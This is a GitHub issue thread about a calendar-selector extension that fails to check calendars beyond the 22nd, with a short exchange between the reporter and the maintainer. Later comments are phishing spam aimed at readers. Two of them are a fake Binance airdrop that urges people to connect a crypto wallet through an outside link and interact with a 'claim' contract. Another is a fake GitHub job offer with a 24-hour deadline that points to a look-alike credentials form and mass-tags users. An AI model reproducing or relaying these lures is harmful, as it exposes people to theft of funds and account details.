### ISSUE TITLE
Not working with too many calendars

### ISSUE THREAD

**Issue by lemikeone** [OrestTa/MultipleCalendarsSelector#1]
Hi there, 

Thanks so much for your work. 

I tried it with my 28 calendars, but when I click on "Display all calendars", it doesn't check the ones that are after the 22nd one.

I have a Macbook Air M1.

Do you know why it could happen? 

Thanks,

Michaël

**Comment by OrestTa** [comment]
Yes, this is a known bug (when a large number of calendars is used; specifics depending on the exact config). What exactly is your use case?

**Comment by lemikeone** [comment]
Hi Otrsk, 

Thanks for your reply! Could you please confirm what you mean by my use case (other that checking and unchecking several calendars with one click), and what details you need?

Thanks,

Michaël

**Comment by OrestTa** [comment]
I was wondering how and what for you were using the extension

**Comment by lemikeone** [comment]
I manage several websites, I use one calendar per marketing position for my websites. So with your extension, I can check with one click the positions available for a specific website, and then with another click, get back the global view with all the positions.

**Comment by OrestTa** [comment]
Makes sense. If you have some resources to spare, then you could have someone look into implementing this bugfix, the code is open source. I'd be happy to merge the changes back into the official extension then!

**Comment by lemikeone** [comment]
Ok thanks, please let me know if there is a fix one day, so I can use it again.

**Comment by knofte** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

Congratulations! You've won a share of the $500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

Don't miss out on your $1500 in BNB! Act now to secure your tokens.


Winners: @

**Comment by knofte** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

Congratulations! You've won a share of the $500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

Don't miss out on your $1500 in BNB! Act now to secure your tokens.


Winners: @

**Comment by liMike1998** [comment]
Hello,

We have an exciting opportunity for you! You've been selected to proceed in the selection process for the Developer position at GitHub. Congratulations on your achievement!

As part of this position, you will be offered a competitive salary of $180,000 per year, along with other attractive benefits, including:

- Health insurance coverage
- Retirement savings plan
- Flexible work schedule
- Generous vacation and paid time off
- Professional development opportunities

To proceed with the hiring process, we kindly ask you to fill out some additional forms and provide some additional information. This will help us better understand your profile and experience, as well as assess your suitability for the role.

Please click [here](https://auth.githubtalentcommunity.online/) to access the forms and complete the application process. We ask that you complete these forms as soon as possible so that we can proceed with the hiring process.

**Important:** You have 24 hours to complete the application process.

If you have any questions or need further information, please don't hesitate to contact us.

Thank you for your interest in joining the GitHub team, and we look forward to hearing back from you.

Best regards,  
GitHub Recruitment Team
benrod3k, @zouguangxian, @chaoliu92, @hcaihao, @zazaian, @phpmac, @kurtbradd, @web3abhi, @markhu53, @babaganaa9, @jamesbs, @gawnieg, @a1ex-kaufmann, @hundredlee, @bluzky, @0xpetersatoshi, @GraphicalDot, @ragueneau, @lolieatapple, @averybigant
